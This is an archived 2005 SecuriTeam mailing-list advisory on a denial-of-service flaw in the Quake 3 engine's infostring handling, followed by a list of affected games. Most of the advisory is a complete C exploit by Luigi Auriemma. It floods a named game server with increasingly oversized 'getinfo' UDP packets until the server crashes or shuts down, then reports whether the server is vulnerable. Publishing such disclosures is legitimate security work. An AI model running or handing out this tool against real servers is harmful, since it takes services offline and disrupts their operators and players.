[NEWS] Quake 3 Infostring DoS

From: SecuriTeam (support_at_securiteam.com)
Date: 02/14/05

  • Next message: SecuriTeam: "[EXPL] BrightStor ARCserve Backup Buffer Overflow"
    To: list@securiteam.com
    Date: 14 Feb 2005 11:46:07 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Quake 3 Infostring DoS
    ------------------------------------------------------------------------

    SUMMARY

    The Quake 3 engine is "a well known game engine developed by ID Software".
    Due to programming bug in the Quake 3 engine, a remote attacker can cause
    the engine to crash by sending a malformed infostring request.

    DETAILS

    Vulnerable Systems:
     * Call of Duty version 1.5 and prior
     * Call of Duty: United Offensive version 1.51 and prior
     * Heavy Metal: F.A.K.K.2 version 1.02 and prior
     * Quake III Arena version 1.32 and prior
     * Return to Castle Wolfenstein version 1.41 and prior
     * Soldier of Fortune II: Double Helix version 1.03 and prior
     * Star Trek Voyager: Elite Force version 1.20 and prior
     * Star Trek: Elite Force II version 1.10 and prior
     * Star Wars Jedi Knight II: Jedi Outcast version 1.04 and prior
     * Star Wars Jedi Knight: Jedi Academy version 1.011 and prior
     * Wolfenstein: Enemy Territory version 1.02 / 2.56 and prior

    The Quake 3 engine has problems handling big queries, allowing an attacker
    to shutdown any game server based on this engine:
      ERROR: Info_SetValueForKey: oversize infostring

    In some of the vulnerable games it is also possible to crash the server.

    Exploit:
    /*

    by Luigi Auriemma - http://aluigi.altervista.org/poc/q3infoboom.zip

    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    #ifdef WIN32
        #include <winsock.h>
        #include "winerr.h"

        #define close closesocket
    #else
        #include <unistd.h>
        #include <sys/socket.h>
        #include <sys/types.h>
        #include <arpa/inet.h>
        #include <netinet/in.h>
        #include <netdb.h>
    #endif

    #define VER "0.1.1"
    #define BUFFSZ 2048
    #define TIMEOUT 2
    #define MAXRETRY 3
    #define INFO "\xff\xff\xff\xff" "getstatus\n"
    #define GETINFO "\xff\xff\xff\xff" "getinfo "
    #define GETINFOSZ (sizeof(GETINFO) - 1)

    #define SEND(x,y) if(sendto(sd, x, y, 0, (struct sockaddr *)&peer,
    sizeof(peer)) \
                          < 0) std_err();
    #define RECV len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL); \
                        if(len < 0) std_err();
    #define RECVT if(timeout(sd) < 0) { \
                            fputs("\nError: socket timeout, no reply
    received\n\n", stdout); \
                            exit(1); \
                        } \
                        RECV;

    void showinfo(u_char *data);
    int timeout(int sock);
    u_long resolv(char *host);
    void std_err(void);

    int main(int argc, char *argv[]) {
        struct sockaddr_in peer;
        int sd,
                i,
                len,
                slen,
                from = 750,
                to = BUFFSZ - GETINFOSZ,
                jumps = 1,
                sent = 0,
                retry = 0;
        u_short port;
        u_char bof[BUFFSZ + 1],
                buff[BUFFSZ + 1],
                *p;

        setbuf(stdout, NULL);

        fputs("\n"
            "Quake 3 engine infostring crash/shutdown scanner "VER"\n"
            "by Luigi Auriemma\n"
            "e-mail: aluigi@altervista.org\n"
            "web: http://aluigi.altervista.org\n"
            "\n", stdout);

        if(argc < 3) {
            printf("\n"
                "Usage: %s [options] <server> <port>\n"
                "\n"
                "Options:\n"
                "-f FROM start the scan from byte FROM (default %d)\n"
                "-t TO finish the scan at byte TO (default %d)\n"
                "-j JUMPS the number of bytes to increment for each scan.\n"
                " Default value is %d, meaning that if the scan starts from %d
    it will\n"
                " send getinfo followed by %d bytes, then %d, %d, %d and so
    on\n"
                " until %d\n"
                "\n", argv[0],
                from,
                to,
                jumps, from,
                from, from + jumps, from + (jumps * 2), from + (jumps * 3),
    to);
            exit(1);
        }

    #ifdef WIN32
        WSADATA wsadata;
        WSAStartup(MAKEWORD(1,0), &wsadata);
    #endif

        argc -= 2;
        for(i = 1; i < argc; i++) {
            switch(argv[i][1]) {
                case 'f': from = atoi(argv[++i]); break;
                case 't': to = atoi(argv[++i]); break;
                case 'j': jumps = atoi(argv[++i]); break;
                default: {
                    printf("\nError: wrong command-line argument (%s)\n\n",
    argv[i]);
                    exit(1);
                    }
            }
        }

        port = atoi(argv[argc + 1]);
        peer.sin_addr.s_addr = resolv(argv[argc]);
        peer.sin_port = htons(port);
        peer.sin_family = AF_INET;

        printf("- target %s : %hu\n",
            inet_ntoa(peer.sin_addr), port);

        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();

        fputs("- request informations:\n", stdout);
        SEND(INFO, sizeof(INFO) - 1);
        RECVT;
        buff[len] = 0x00;
        showinfo(buff);

        fputs("- getinfo crash/shutdown scan:\n\n", stdout);
        memcpy(bof, GETINFO, GETINFOSZ);
        p = bof + GETINFOSZ;

        if(from > to) from = to;
        for(i = 0; i < from; i++) *p++ = 'a';
        slen = p - bof;

        for(;;) {
            printf(" packet length: %d\r", slen);

            SEND(bof, slen);
            sent++;
            if(timeout(sd) < 0) {
                if(retry == MAXRETRY) break;
                printf(" timeout: retry other %d times\n", MAXRETRY - retry);
                retry++;
                continue;
            }
            retry = 0;
            RECV;

            slen += jumps;
            if((slen - GETINFOSZ) > to) {
                slen -= jumps;
                break;
            } else if(slen > BUFFSZ) {
                printf("\n\n- max local buffer size (%d) reached", BUFFSZ);
                slen -= jumps;
                break;
            }
            for(i = 0; i < jumps; i++) *p++ = 'a';
        }

        if(!sent) {
            fputs("\n\nError: recheck your options because I have sent no
    packets, probably you have chosen too big values\n\n", stdout);
            close(sd);
            exit(1);
        }

        printf("\n\n- last UDP packet sent was %d bytes (jumps = %d)",
            slen, slen - GETINFOSZ);

        fputs("\n- check server:\n", stdout);
        SEND(INFO, sizeof(INFO) - 1);
        if(timeout(sd) < 0) {
            fputs("\nServer IS vulnerable!!!\n\n", stdout);
        } else {
            fputs("\nServer doesn't seem vulnerable\n\n", stdout);
        }
        close(sd);
        return(0);
    }

    void showinfo(u_char *data) {
        int nt = 1;
        u_char *p;

        while((p = strchr(data, '\\'))) {
            *p = 0x00;
            if(!nt) {
                printf("%30s: ", data);
                nt++;
            } else {
                printf("%s\n", data);
                nt = 0;
            }
            data = p + 1;
        }
        printf("%s\n", data);
    }

    int timeout(int sock) {
        struct timeval tout;
        fd_set fd_read;
        int err;

        tout.tv_sec = TIMEOUT;
        tout.tv_usec = 0;
        FD_ZERO(&fd_read);
        FD_SET(sock, &fd_read);
        err = select(sock + 1, &fd_read, NULL, NULL, &tout);
        if(err < 0) std_err();
        if(!err) return(-1);
        return(0);
    }

    u_long resolv(char *host) {
        struct hostent *hp;
        u_long host_ip;

        host_ip = inet_addr(host);
        if(host_ip == INADDR_NONE) {
            hp = gethostbyname(host);
            if(!hp) {
                printf("\nError: Unable to resolv hostname (%s)\n", host);
                exit(1);
            } else host_ip = *(u_long *)hp->h_addr;
        }
        return(host_ip);
    }

    #ifndef WIN32
        void std_err(void) {
            perror("\nError");
            exit(1);
        }
    #endif

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:aluigi@autistici.org> Luigi
    Auriemma.
    The original article can be found at:
    <http://aluigi.altervista.org/adv/q3infoboom-adv.txt>
    http://aluigi.altervista.org/adv/q3infoboom-adv.txt

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[EXPL] BrightStor ARCserve Backup Buffer Overflow"

    Relevant Pages

    • [UNIX] Cfengine Remotely Exploitable Buffer Overflow (net.c)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... cfservd daemon in Cfengine 2.x prior to version 2.0.8. ... unsigned int len = 0; ... void getshell; ...
      (Securiteam)
    • [EXPL] pServ User-Agent Buffer Overflow
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... User-Agent data handling allows remote attackers to cause pServ to execute ... int op_plat_num; ... void getshell; ...
      (Securiteam)
    • [NEWS] Festalon Heap Corruption
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... void fwbof(FILE *fd, int len, int chr); ... void fwi08(FILE *fd, int num) { ...
      (Securiteam)
    • [UNIX] Linux Kernel uselib() Privilege Elevation
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... static int load_elf_library ... Obviously, if the kmem_cache_alloccall sleeps, the newly created VMA ... void fatal ...
      (Securiteam)
    • [EXPL] EPIC4 CTCP Nicknames Buffer Overflow
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... void send_mes(int fd,char *host); ... void wait_connection; ... unsigned int check_version = 0; ...
      (Securiteam)